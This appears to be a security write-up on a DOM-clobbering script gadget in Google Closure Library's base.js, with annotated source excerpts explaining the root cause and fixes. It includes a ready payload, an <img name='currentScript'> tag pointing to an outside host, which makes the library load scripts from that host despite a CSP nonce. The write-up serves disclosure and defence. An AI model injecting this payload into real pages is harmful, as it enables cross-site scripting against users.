Closure Library is a powerful, low-level JavaScript library designed for building complex and scalable web applications. It is used by many Google web applications, such as Google Search, Gmail, Google Docs, Google+, Google Maps, and others.
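The Google Closure Library was using the `document.currentScript` property to work out the base path from which it loads additional scripts. A named element present in the page, such as the `<img name="currentScript">` below, shadows that property (DOM clobbering), so the library reads the base path from that element's `src` instead of from its own `<script>` tag.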
<!-- user input -->
<!-- The name attribute makes document.currentScript resolve to this <img> rather than to the executing <script>. Its src ends in "base.js", which is the only part of the URL the library's file-name check compares. Removing or prefixing name/id attributes in user-supplied markup prevents this shadowing. -->
<img name="currentScript" src="https://gmsgadget.com/assets/xss/base.js">
<!-- Nonce-bearing include of Closure Library 20230103.0.0. While it executes, base.js reads document.currentScript to derive goog.basePath. -->
<script nonce="secret" src="https://cdnjs.cloudflare.com/ajax/libs/google-closure-library/20230103.0.0/base.js"></script>
Root Cause
// Excerpt from the base-path discovery in base.js; the enclosing function is
// not shown. It locates the script whose URL ends in 'base.js' and stores the
// part of the URL before that file name in goog.basePath.
//
// If we have a currentScript available, use it exclusively.
// NOTE(review): doc is presumably the page's document (its assignment is
// outside this excerpt). doc.currentScript is then an ordinary property
// lookup that a named element, such as the <img name="currentScript"> shown
// on this page, can shadow, so the value may not be the running <script>.
var currentScript = doc.currentScript;
if (currentScript) {
// Any truthy value is accepted here; nothing verifies it is a <script>
// element. A guard such as `currentScript instanceof HTMLScriptElement`
// before trusting its src would reject a shadowing element.
var scripts = [currentScript];
} else {
var scripts = doc.getElementsByTagName('SCRIPT');
}
// Search backwards since the current script is in almost all cases the one
// that has base.js.
for (var i = scripts.length - 1; i >= 0; --i) {
// The @type cast is a compiler annotation only; it performs no runtime check
// on what scripts[i] actually is.
var script = /** @type {!HTMLScriptElement} */ (scripts[i]);
var src = script.src;
// Ignore any query string when matching the file name.
var qmark = src.lastIndexOf('?');
var l = qmark == -1 ? src.length : qmark;
// Only the trailing 7 characters are compared with 'base.js'; the origin and
// directory of src are not validated against anything.
if (src.slice(l - 7, l) == 'base.js') {
// Everything before 'base.js' becomes the prefix used for later loads
// (see goog.basePath + relPath in loadClosureDeps).
goog.basePath = src.slice(0, l - 7);
return;
}
}
// [...]
/**
 * Queues Closure's own deps.js as a dependency and then calls loadDeps_().
 *
 * The dependency path is goog.basePath + 'deps.js' after normalization, so the
 * directory stored in goog.basePath decides where this script is requested
 * from. NOTE(review): goog.basePath is used as-is; if it was derived from an
 * element the page author does not control, deps.js is requested from that
 * element's origin. Validating the source of basePath where it is assigned is
 * the place to stop this.
 */
goog.DebugLoader_.prototype.loadClosureDeps = function() {
// Circumvent addDependency, which would try to transpile deps.js if
// transpile is set to always.
var relPath = 'deps.js';
// The empty arrays and object are passed straight to createDependency; their
// meaning is defined by the factory, which is not shown in this excerpt.
this.depsToLoad_.push(this.factory_.createDependency(
goog.normalizePath_(goog.basePath + relPath), relPath, [], [], {}));
// Presumably starts fetching the queued dependencies; body not shown here.
this.loadDeps_();
};
Related links:
Found by jackfromeast, ishmeals.